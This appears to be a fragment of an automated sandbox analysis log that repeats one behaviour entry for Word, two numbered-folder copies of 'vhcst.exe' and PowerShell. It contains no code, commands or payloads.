                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\2716439\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\2716439\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\2716439\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\2716439\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\2716439\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\2716439\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\2716439\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\2716439\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\2716439\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\2716439\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\2716439\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\2716439\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\2716439\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\2716439\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\2716439\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\2716439\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\2716439\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\7037005\vhcst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
